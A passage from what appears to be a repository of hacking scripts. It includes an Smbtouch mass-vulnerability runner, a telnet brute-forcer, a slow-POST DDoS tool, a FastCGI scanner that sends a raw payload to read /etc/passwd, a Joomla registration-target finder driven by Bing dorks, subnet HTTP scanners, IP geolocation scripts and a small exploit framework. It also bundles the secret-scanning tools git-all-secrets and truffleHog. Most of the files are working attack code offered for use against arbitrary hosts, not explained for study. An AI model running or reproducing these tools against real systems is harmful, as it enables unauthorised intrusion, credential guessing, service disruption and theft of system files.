out_temp.fileno() 51 | run_cmd = 'Smbtouch-1.1.1.exe --TargetIp %s' % targetip.strip() 52 | app = subprocess.Popen(run_cmd, shell=True, stdout=fileno, stderr=fileno) 53 | app.wait() 54 | out_temp.seek(0) 55 | lines = out_temp.readlines() 56 | newlines = ''.join(lines) 57 | if "successfully" in newlines: 58 | info=re.findall("Target OS (Version.*?)\[",newlines,re.S)[0].strip().split("\r\n") 59 | vul=re.findall("\[Vulnerable\](.*?)\[",newlines,re.S)[0].strip().split("\r\n") 60 | for i in info: 61 | templist.append(i.strip()) 62 | for j in vul: 63 | templist.append(re.sub("\s*","",j.strip())) 64 | print "----".join(templist) 65 | logout("----".join(templist)) 66 | elif "Target OS" in newlines: 67 | info=re.findall("Target OS (Version.*?)\[",newlines,re.S)[0].strip().split("\r\n") 68 | for i in info: 69 | templist.append(i.strip()) 70 | print "----".join(templist) 71 | logout("----".join(templist)) 72 | #logout(newlines) 73 | 74 | if out_temp: 75 | out_temp.close() 76 | 77 | 78 | 79 | if __name__=='__main__': 80 | if len(sys.argv)==3: 81 | with open(sys.argv[1]) as f: 82 | urls=f.readlines() 83 | nums=len(urls) 84 | MyThread(urls) 85 | else: 86 | print "Python file.py ips.txt thread" -------------------------------------------------------------------------------- /TELNET暴力破解.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/python 2 | 3 | #Telnet Brute Forcer 4 | #http://www.darkc0de.com 5 | #d3hydr8[at]gmail[dot]com 6 | 7 | import threading, time, random, sys, telnetlib 8 | from copy import copy 9 | 10 | if len(sys.argv) !=4: 11 | print "Usage: ./telnetbrute.py " 12 | sys.exit(1) 13 | 14 | try: 15 | users = open(sys.argv[2], "r").readlines() 16 | except(IOError): 17 | print "Error: Check your userlist path\n" 18 | sys.exit(1) 19 | 20 | try: 21 | words = open(sys.argv[3], "r").readlines() 22 | except(IOError): 23 | print "Error: Check your wordlist path\n" 24 | sys.exit(1) 25 | 26 | print "\n\t d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0" 27 | print "\t--------------------------------------------------\n" 28 | print "[+] Server:",sys.argv[1] 29 | print "[+] Users Loaded:",len(users) 30 | print "[+] Words Loaded:",len(words),"\n" 31 | 32 | wordlist = copy(words) 33 | 34 | def reloader(): 35 | for word in wordlist: 36 | words.append(word) 37 | 38 | def getword(): 39 | lock = threading.Lock() 40 | lock.acquire() 41 | if len(words) != 0: 42 | value = random.sample(words, 1) 43 | words.remove(value[0]) 44 | 45 | else: 46 | print "\nReloading Wordlist - Changing User\n" 47 | reloader() 48 | value = random.sample(words, 1) 49 | users.remove(users[0]) 50 | 51 | lock.release() 52 | if len(users) ==1: 53 | return value[0][:-1], users[0] 54 | else: 55 | return value[0][:-1], users[0][:-1] 56 | 57 | class Worker(threading.Thread): 58 | 59 | def run(self): 60 | value, user = getword() 61 | try: 62 | print "-"*12 63 | print "User:",user,"Password:",value 64 | tn = telnetlib.Telnet(sys.argv[1]) 65 | tn.read_until("login: ") 66 | tn.write(user + "\n") 67 | if password: 68 | tn.read_until("Password: ") 69 | tn.write(value + "\n") 70 | tn.write("ls\n") 71 | tn.write("exit\n") 72 | print tn.read_all() 73 | print "\t\nLogin successful:",value, user 74 | tn.close() 75 | work.join() 76 | sys.exit(2) 77 | except: 78 | pass 79 | 80 | for I in range(len(words)*len(users)): 81 | work = Worker() 82 | work.start() 83 | time.sleep(1) -------------------------------------------------------------------------------- /cc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | import time 4 | import threading 5 | #Pressure Test,ddos tool 6 | #--------------------------- 7 | MAX_CONN=20000 8 | PORT=80 9 | HOST="url" 10 | PAGE="/" 11 | #--------------------------- 12 | 13 | buf=("POST %s HTTP/1.1\r\n" 14 | "Host: %s\r\n" 15 | "Content-Length: 10000000\r\n" 16 | "Cookie: dklkt_dos_test\r\n" 17 | "\r\n" % (PAGE,HOST)) 18 | 19 | socks=[] 20 | 21 | def conn_thread(): 22 | global socks 23 | for i in range(0,MAX_CONN): 24 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 25 | try: 26 | s.connect((HOST,PORT)) 27 | s.send(buf) 28 | print "Send buf OK!,conn=%d\n"%i 29 | socks.append(s) 30 | except Exception,ex: 31 | print "Could not connect to server or send error:%s"%ex 32 | time.sleep(10) 33 | #end def 34 | 35 | def send_thread(): 36 | global socks 37 | while True: 38 | for s in socks: 39 | try: 40 | s.send("f") 41 | #print "send OK!" 42 | except Exception,ex: 43 | print "Send Exception:%s\n"%ex 44 | socks.remove(s) 45 | s.close() 46 | time.sleep(1) 47 | #end def 48 | 49 | conn_th=threading.Thread(target=conn_thread,args=()) 50 | send_th=threading.Thread(target=send_thread,args=()) 51 | 52 | conn_th.start() 53 | send_th.start() 54 | -------------------------------------------------------------------------------- /cgi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #cgi.py -a 110.164.68.1/24 -t 50 4 | import threading 5 | import argparse 6 | import socket 7 | import Queue 8 | import netaddr 9 | import time 10 | import sys 11 | class CgiScan: 12 | def __init__(self,addr,tnum): 13 | self.scanque = Queue.Queue() 14 | self.tnum = tnum 15 | self.tmpnum = tnum 16 | self.lock = threading.Lock() 17 | self.openlist = [] 18 | if addr.find("-") != -1: 19 | for ip in netaddr.IPRange(addr.split("-")[0],addr.split("-")[1]): 20 | self.scanque.put(ip) 21 | else: 22 | for ip in netaddr.IPNetwork(addr).iter_hosts(): 23 | self.scanque.put(ip) 24 | self.qsize = self.scanque.qsize() 25 | for i in range(tnum): 26 | t = threading.Thread(target=self.ScanPort) 27 | t.setDaemon(True) 28 | t.start() 29 | while self.tmpnum > 0: 30 | time.sleep(1.0) 31 | print '[*]:scan fastcgi vulnerable...' 32 | for ip in self.openlist: 33 | self.test_fastcgi(ip) 34 | 35 | def test_fastcgi(self,ip): 36 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0) 37 | sock.connect((ip, 9000)) 38 | data = """ 39 | 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 40 | 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 41 | 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 42 | 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 43 | 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52 44 | 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44 45 | 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 46 | 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 47 | 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53 48 | 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69 49 | 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00 50 | """ 51 | data_s = '' 52 | for _ in data.split(): 53 | data_s += chr(int(_,16)) 54 | sock.send(data_s) 55 | try: 56 | ret = sock.recv(1024) 57 | if ret.find(':root:') > 0: 58 | #print ret 59 | print '[+] %s is vulnerable!' % ip 60 | except Exception, e: 61 | pass 62 | 63 | sock.close() 64 | 65 | def ScanPort(self): 66 | while self.scanque.qsize() > 0: 67 | try: 68 | ip = self.scanque.get() 69 | self.lock.acquire() 70 | print str(ip) + " \r", 71 | self.lock.release() 72 | s = socket.socket() 73 | s.settimeout(3) 74 | s.connect((str(ip), 9000)) 75 | self.lock.acquire() 76 | print ip," 9000 open" 77 | self.openlist.append(str(ip)) 78 | self.lock.release() 79 | except: 80 | pass 81 | self.tmpnum -= 1 82 | if __name__ == "__main__": 83 | parse = argparse.ArgumentParser(description="CgiScan") 84 | parse.add_argument('-a','--addr', type=str, help="ipaddress") 85 | parse.add_argument('-t','--thread', type=int, help="Thread Number",default=100) 86 | args = parse.parse_args() 87 | if not args.addr: 88 | parse.print_help() 89 | sys.exit(0) 90 | addr = args.addr 91 | tnum = args.thread 92 | CgiScan(addr,tnum) -------------------------------------------------------------------------------- /com_user server scanner.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/python 2 | 3 | import socket 4 | from urlparse import urlparse 5 | import time, urllib2, re, httplib 6 | print ''' 7 | #=[+]==========================================[+]=# 8 | | com_user server scanner | 9 | |==================================================| 10 | | Coded by Budz Story-zz | 11 | | Indonesian Fighter Cyber | 12 | #=[+]==========================================[+]=# 13 | ''' 14 | file2=open('user.txt','a') 15 | 16 | 17 | 18 | def check(site) : 19 | try : 20 | 21 | w = urllib2.urlopen(site).read() 22 | except urllib2.URLError, (err): 23 | pass 24 | except socket.error , v : 25 | pass 26 | except urllib2.HTTPError, err: 27 | pass 28 | except IOError, e: 29 | pass 30 | except httplib.IncompleteRead ,e: 31 | pass 32 | else : 33 | if re.findall('Joomla! - Open Source Content Management',w) : 34 | ox= urlparse(site) 35 | print 'w00t ! ! Found In => ' + ox[1] 36 | file2.write(ox[1]+'\n') 37 | 38 | def xlol(site): 39 | try: 40 | 41 | urllib2.urlopen(site) 42 | 43 | except urllib2.URLError, (err): 44 | pass 45 | except socket.error , v : 46 | pass 47 | except urllib2.HTTPError, err: 48 | pass 49 | except IOError, e: 50 | pass 51 | else: 52 | check(site) 53 | def bing_it(ip): 54 | 55 | page = 0 56 | while(page <= 200): 57 | try : 58 | bing = "http://www.bing.com/search?q=registration+site:"+ip+"+index.php%2Fusing-joomla%2Fextension%2F&go=&qs=ds&form=QBRE"+str(page) 59 | 60 | openbing = urllib2.urlopen(bing) 61 | 62 | readbing = openbing.read() 63 | findbing = re.findall('

    3 | 4 | ADD . /data 5 | WORKDIR /data/thog 6 | 7 | RUN apt-get update && apt-get install -y python-pip 8 | RUN pip install -r requirements.txt 9 | RUN chmod +x truffleHog/truffleHog.py 10 | 11 | WORKDIR /data 12 | RUN chmod +x rungitsecrets.sh 13 | RUN git clone https://github.com/anshumanbh/git-secrets.git && cd git-secrets && make install 14 | 15 | RUN go get github.com/google/go-github/github && go get github.com/satori/go.uuid && go get golang.org/x/oauth2 16 | RUN go build -o gitallsecrets . 17 | 18 | ENTRYPOINT ["./gitallsecrets"] -------------------------------------------------------------------------------- /git-all-secrets-master/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Anshuman Bhartiya 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /git-all-secrets-master/rungitsecrets.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd $1 4 | 5 | git secrets --install 6 | git secrets --register-aws 7 | git secrets --add 'xoxp-.*' 8 | git secrets --add 'xoxb-.*' 9 | git secrets --scan -r . > $2 10 | 11 | exit 0 -------------------------------------------------------------------------------- /git-all-secrets-master/thog/.gitignore: -------------------------------------------------------------------------------- 1 | /build/ 2 | /dist/ 3 | /truffleHog.egg-info/ 4 | */__pycache__/ 5 | env/ 6 | -------------------------------------------------------------------------------- /git-all-secrets-master/thog/requirements.txt: -------------------------------------------------------------------------------- 1 | Git==2.1.3 2 | gitdb2==2.0.2 3 | smmap2==2.0.2 4 | -------------------------------------------------------------------------------- /git-all-secrets-master/thog/setup.cfg: -------------------------------------------------------------------------------- 1 | [bdist_wheel] 2 | universal=1 3 | -------------------------------------------------------------------------------- /git-all-secrets-master/thog/setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup 2 | 3 | setup( 4 | name='truffleHog', 5 | version='1.0.2', 6 | description='Searches through git repositories for high entropy strings, digging deep into commit history.', 7 | url='https://github.com/dxa4481/truffleHog', 8 | author='Dylan Ayrey', 9 | author_email='dxa4481@rit.edu', 10 | license='GNU', 11 | packages =['truffleHog'], 12 | install_requires=[ 13 | 'GitPython == 2.1.1' 14 | ], 15 | entry_points = { 16 | 'console_scripts': ['trufflehog = truffleHog.truffleHog:main'], 17 | }, 18 | ) 19 | -------------------------------------------------------------------------------- /git-all-secrets-master/thog/truffleHog/__init__.py: -------------------------------------------------------------------------------- 1 | from truffleHog import find_strings 2 | -------------------------------------------------------------------------------- /httpscan.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | # Author: Zeroh 3 | 4 | import re 5 | import sys 6 | import Queue 7 | import threading 8 | import optparse 9 | import requests 10 | from IPy import IP 11 | 12 | printLock = threading.Semaphore(1) #lock Screen print 13 | TimeOut = 5 #request timeout 14 | 15 | #User-Agent 16 | header = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36','Connection':'close'} 17 | 18 | class scan(): 19 | 20 | def __init__(self,cidr,threads_num): 21 | self.threads_num = threads_num 22 | self.cidr = IP(cidr) 23 | #build ip queue 24 | self.IPs = Queue.Queue() 25 | for ip in self.cidr: 26 | ip = str(ip) 27 | self.IPs.put(ip) 28 | 29 | def request(self): 30 | with threading.Lock(): 31 | while self.IPs.qsize() > 0: 32 | ip = self.IPs.get() 33 | try: 34 | r = requests.Session().get('http://'+str(ip),headers=header,timeout=TimeOut) 35 | status = r.status_code 36 | title = re.search(r'(.*)', r.text) #get the title 37 | if title: 38 | title = title.group(1).strip().strip("\r").strip("\n")[:30] 39 | else: 40 | title = "None" 41 | banner = '' 42 | try: 43 | banner += r.headers['Server'][:20] #get the server banner 44 | except:pass 45 | printLock.acquire() 46 | print "|%-16s|%-6s|%-20s|%-30s|" % (ip,status,banner,title) 47 | print "+----------------+------+--------------------+------------------------------+" 48 | 49 | #Save log 50 | with open("./log/"+self.cidr.strNormal(3)+".log",'a') as f: 51 | f.write(ip+"\n") 52 | 53 | except Exception,e: 54 | printLock.acquire() 55 | finally: 56 | printLock.release() 57 | 58 | #Multi thread 59 | def run(self): 60 | for i in range(self.threads_num): 61 | t = threading.Thread(target=self.request) 62 | t.start() 63 | 64 | if __name__ == "__main__": 65 | parser = optparse.OptionParser("Usage: %prog [options] target") 66 | parser.add_option("-t", "--thread", dest = "threads_num", 67 | default = 1, type = "int", 68 | help = "[optional]number of theads,default=10") 69 | (options, args) = parser.parse_args() 70 | if len(args) < 1: 71 | parser.print_help() 72 | sys.exit(0) 73 | 74 | print "+----------------+------+--------------------+------------------------------+" 75 | print "| IP |Status| Server | Title |" 76 | print "+----------------+------+--------------------+------------------------------+" 77 | 78 | s = scan(cidr=args[0],threads_num=options.threads_num) 79 | s.run() 80 | -------------------------------------------------------------------------------- /ip-location/README.md: -------------------------------------------------------------------------------- 1 | # ip-location 2 | 高精度IP地址定位 3 | -------------------------------------------------------------------------------- /ip地址精准定位.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | # author:allen权 3 | import sys 4 | import urllib2 5 | import json 6 | 7 | def get_ip_information(ip): 8 | url='http://api.map.baidu.com/highacciploc/v1?qcip='+ip+'&qterm=pc&ak='你的密钥(AK)'&coord=bd09ll&extensions=3' 9 | poiss='' 10 | request = urllib2.Request(url) 11 | page = urllib2.urlopen(request, timeout=10) 12 | data_json = page.read() 13 | data_dic = json.loads(data_json) 14 | if(data_dic.has_key("content")): 15 | content=data_dic["content"] 16 | address_component=content["address_component"] 17 | formatted_address=content["formatted_address"] 18 | print "该IP地址的具体位置为:" 19 | print address_component["country"] 20 | print formatted_address 21 | if (content.has_key("pois")): 22 | print "该IP地址附近POI信息如下:" 23 | pois = content["pois"] 24 | for index in range(len(pois)): 25 | pois_name = pois[index]["name"] 26 | pois_address = pois[index]["address"] 27 | print pois_name, pois_address 28 | else: 29 | print 'IP地址定位失败!!!' 30 | if __name__ == '__main__': 31 | get_ip_information('183.55.116.95') -------------------------------------------------------------------------------- /ip物理地址定位.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ip物理地址定位.py -------------------------------------------------------------------------------- /kali-tools-master/.gitignore: -------------------------------------------------------------------------------- 1 | **/dist/ 2 | **/__pycache__/ 3 | -------------------------------------------------------------------------------- /kali-tools-master/LICENCE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) [year] [fullname] 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /kali-tools-master/README.md: -------------------------------------------------------------------------------- 1 | # Kali Tools 2 | 3 | This script enables to run **all kali tools**, on every Linux distributions. More specifically, it allows cloning the source repo of the packages (and automatically install them if needed), per package, as needed. 4 | 5 | Additionnally, it allows **searching** for tools, a feature I was dearly missing even in Kali. Searching works on packages name **and descriptions** (which were manually curated, then hardcoded in this repo to avoid unneeded network access). 6 | 7 | Inspired from [LionSec/Katoolin](https://github.com/LionSec/katoolin), but not restricted to Ubuntu/Debian. 8 | 9 | Author: [Ludovic Barman](https://lbarman.ch) 10 | 11 | ## Demo: Search + Descriptions 12 | 13 | ![demo 1](demo1.png "Search demo on kali tools") 14 | 15 | ## Demo: Kali Menu 16 | 17 | ![demo 2](demo2.png "Menu demo on kali tools") 18 | -------------------------------------------------------------------------------- /kali-tools-master/demo1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/kali-tools-master/demo1.png -------------------------------------------------------------------------------- /kali-tools-master/demo2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/kali-tools-master/demo2.png -------------------------------------------------------------------------------- /kali-tools-master/helpers.py: -------------------------------------------------------------------------------- 1 | # test all packages names against the reference URL, shows broken links / packages 2 | def testAllURLs(): 3 | allPackages = [] 4 | for cat in data.packages: 5 | allPackages += data.packages[cat] 6 | allPackages = set(allPackages) 7 | allPackages = sorted(list(allPackages)) 8 | 9 | #get the page referencing all packages 10 | source = "" 11 | try: 12 | print("Contacting web server...") 13 | req = requests.get("http://git.kali.org/gitweb/", timeout=30) 14 | print("Done.") 15 | source = req.text 16 | except: 17 | print("Could not read git repos") 18 | sys.exit(1) 19 | 20 | #for each package, check if in page 21 | for p in allPackages: 22 | if p not in data.specialGitURL: 23 | fullPath = "packages/"+p+".git" 24 | if p not in source: 25 | print("Error", p, "@", fullPath, "not found.") 26 | 27 | 28 | # fetches the links to get the full description of the pacakge 29 | def fetchPackageLinks(): 30 | d = requests.get("http://tools.kali.org/tools-listing") 31 | rawHtml = d.text 32 | soup = BeautifulSoup(rawHtml, 'html.parser') 33 | links = {} 34 | for link in soup.find_all('a'): 35 | if "") != -1: 31 | self.result['status'] = False 32 | return False 33 | flag = False 34 | for word in keyword: 35 | if word in content: 36 | self.result['status'] = True 37 | break 38 | self.result['info'] = "存在Svn泄露漏洞,验证url: %s" % (vul_url,vul_url) -------------------------------------------------------------------------------- /lcy/exploits/website/svn_information_disclosure.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/exploits/website/svn_information_disclosure.pyc -------------------------------------------------------------------------------- /lcy/exploits/website/webserver_Parsing_vulnerability.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author: Lcy 4 | # @Date: 2016-09-20 15:34:41 5 | # @Last Modified by: Lcy 6 | # @Last Modified time: 2016-09-21 17:24:52 7 | import urllib2 8 | class Exploit: 9 | def __init__(self,target,expfile): 10 | self.target = target 11 | self.result = { 12 | "name": "IIS7 NGINX 解析漏洞", 13 | "author": "Lcy", 14 | "type": "website", 15 | "ref": "https://phpinfo.me", 16 | "status":False, 17 | "info":"", 18 | 'filename':expfile + ".py", 19 | "target":target, 20 | } 21 | def verify(self): 22 | file_path = "/robots.txt/.php" 23 | try: 24 | file_url = self.target+file_path 25 | req = urllib2.Request(file_url) 26 | res = urllib2.urlopen(req,timeout=3) 27 | content = res.read() 28 | if res.getcode() == 200: 29 | if content.find("<") != -1: 30 | return False 31 | self.result['status'] = True 32 | self.result["info"] = "目标 {url} 存在解析漏洞 验证url:{verify_url}".format( 33 | url = self.target, 34 | verify_url=file_url 35 | ) 36 | except Exception,e: 37 | pass 38 | -------------------------------------------------------------------------------- /lcy/exploits/website/webserver_Parsing_vulnerability.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/exploits/website/webserver_Parsing_vulnerability.pyc -------------------------------------------------------------------------------- /lcy/lcy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author: Lcy 4 | # @Date: 2016-09-20 10:01:26 5 | # @Last Modified by: Lcy 6 | # @Last Modified time: 2016-09-21 11:34:31 7 | from lib.Color import * 8 | from lib.framework import * 9 | import os 10 | lcy = framework() 11 | lcy.lbanner() 12 | if __name__=='__main__': 13 | try: 14 | while True: 15 | color.cprint("lcy",GREY,0) 16 | cmd=raw_input('>') 17 | cmds = lcy.formatCmd(cmd) 18 | if(len(cmds) == 0): 19 | continue 20 | if cmds[0] == 'exit': 21 | lcy.lexit() 22 | if cmds[0] == 'banner': 23 | lcy.lbanner() 24 | elif cmds[0] == 'show': 25 | lcy.lshow(cmds[1:]) 26 | elif cmds[0] == 'set': 27 | lcy.lset(cmds[1:]) 28 | elif cmds[0] == 'exploit': 29 | lcy.lexploit(cmds[1:]) 30 | else: 31 | os.system(cmd) 32 | except KeyboardInterrupt: 33 | exit() 34 | except Exception,e: 35 | print e 36 | -------------------------------------------------------------------------------- /lcy/lib/Color.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Mst=>libs=>color 3 | ''' 4 | from os import name 5 | if name == 'nt': 6 | '''windows color table''' 7 | #global BLACK,BLUE,GREEN,CYAN,RED,PURPLE,YELLOW,WHITE,GREY 8 | BLACK = 0x0 9 | BLUE = 0x01 10 | GREEN = 0x02 11 | CYAN = 0x03 12 | RED = 0x04 13 | PURPLE= 0x05 14 | YELLOW= 0x06 15 | WHITE = 0x07 16 | GREY = 0x08 17 | else: 18 | '''other os color table''' 19 | #global BLACK,BLUE,GREEN,CYAN,RED,PURPLE,YELLOW,WHITE,GREY 20 | BLACK = '\033[0m' 21 | BLUE = '\033[34m' 22 | GREEN = '\033[32m' 23 | CYAN = '\033[36m' 24 | RED = '\033[31m' 25 | PURPLE= '\033[35m' 26 | YELLOW= '\033[33m' 27 | WHITE = '\033[37m' 28 | GREY = '\033[38m' 29 | wincode = """ 30 | class ntcolor: 31 | '''windows cmd color''' 32 | try: 33 | STD_INPUT_HANDLE = -10 34 | STD_OUTPUT_HANDLE= -11 35 | STD_ERROR_HANDLE = -12 36 | import ctypes 37 | std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE) 38 | def set_cmd_text_color(self,color, handle=std_out_handle): 39 | '''set color''' 40 | bool = self.ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color) 41 | return bool 42 | def resetColor(self): 43 | '''reset color''' 44 | self.set_cmd_text_color(RED|GREEN|BLUE) 45 | def cprint(self,msg,color=BLACK,enter=1): 46 | '''print color message''' 47 | self.set_cmd_text_color(color|color|color) 48 | if enter == 1: 49 | print msg 50 | else: 51 | print msg, 52 | self.resetColor() 53 | except: 54 | pass 55 | """ 56 | otcode = """ 57 | class otcolor: 58 | '''other os terminal color''' 59 | def cprint(self,msg,color=BLACK,enter=1): 60 | '''print color message''' 61 | if enter == 1: 62 | print color+msg+BLACK 63 | else: 64 | print color+msg+BLACK, 65 | """ 66 | if __name__ == '__main__': 67 | print __doc__ 68 | else: 69 | if name == 'nt': 70 | exec(wincode) 71 | color = ntcolor() 72 | else: 73 | exec(otcode) 74 | color = otcolor() 75 | -------------------------------------------------------------------------------- /lcy/lib/Color.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/Color.pyc -------------------------------------------------------------------------------- /lcy/lib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author: Lcy 4 | # @Date: 2016-09-20 10:13:59 5 | # @Last Modified by: Lcy 6 | # @Last Modified time: 2016-09-20 10:14:00 7 | -------------------------------------------------------------------------------- /lcy/lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/__init__.pyc -------------------------------------------------------------------------------- /lcy/lib/consle_width.py: -------------------------------------------------------------------------------- 1 | """ getTerminalSize() 2 | - get width and height of console 3 | - works on linux,os x,windows,cygwin(windows) 4 | """ 5 | 6 | __all__=['getTerminalSize'] 7 | 8 | 9 | def getTerminalSize(): 10 | import platform 11 | current_os = platform.system() 12 | tuple_xy=None 13 | if current_os == 'Windows': 14 | tuple_xy = _getTerminalSize_windows() 15 | if tuple_xy is None: 16 | tuple_xy = _getTerminalSize_tput() 17 | # needed for window's python in cygwin's xterm! 18 | if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'): 19 | tuple_xy = _getTerminalSize_linux() 20 | if tuple_xy is None: 21 | print "default" 22 | tuple_xy = (80, 25) # default value 23 | return tuple_xy 24 | 25 | def _getTerminalSize_windows(): 26 | res=None 27 | try: 28 | from ctypes import windll, create_string_buffer 29 | 30 | # stdin handle is -10 31 | # stdout handle is -11 32 | # stderr handle is -12 33 | 34 | h = windll.kernel32.GetStdHandle(-12) 35 | csbi = create_string_buffer(22) 36 | res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi) 37 | except: 38 | return None 39 | if res: 40 | import struct 41 | (bufx, bufy, curx, cury, wattr, 42 | left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw) 43 | sizex = right - left + 1 44 | sizey = bottom - top + 1 45 | return sizex, sizey 46 | else: 47 | return None 48 | 49 | def _getTerminalSize_tput(): 50 | # get terminal width 51 | # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window 52 | try: 53 | import subprocess 54 | proc=subprocess.Popen(["tput", "cols"],stdin=subprocess.PIPE,stdout=subprocess.PIPE) 55 | output=proc.communicate(input=None) 56 | cols=int(output[0]) 57 | proc=subprocess.Popen(["tput", "lines"],stdin=subprocess.PIPE,stdout=subprocess.PIPE) 58 | output=proc.communicate(input=None) 59 | rows=int(output[0]) 60 | return (cols,rows) 61 | except: 62 | return None 63 | 64 | 65 | def _getTerminalSize_linux(): 66 | def ioctl_GWINSZ(fd): 67 | try: 68 | import fcntl, termios, struct, os 69 | cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,'1234')) 70 | except: 71 | return None 72 | return cr 73 | cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2) 74 | if not cr: 75 | try: 76 | fd = os.open(os.ctermid(), os.O_RDONLY) 77 | cr = ioctl_GWINSZ(fd) 78 | os.close(fd) 79 | except: 80 | pass 81 | if not cr: 82 | try: 83 | cr = (env['LINES'], env['COLUMNS']) 84 | except: 85 | return None 86 | return int(cr[1]), int(cr[0]) 87 | 88 | if __name__ == "__main__": 89 | sizex,sizey=getTerminalSize() 90 | print 'width =',sizex,'height =',sizey -------------------------------------------------------------------------------- /lcy/lib/consle_width.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/consle_width.pyc -------------------------------------------------------------------------------- /lcy/lib/framework.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/framework.pyc 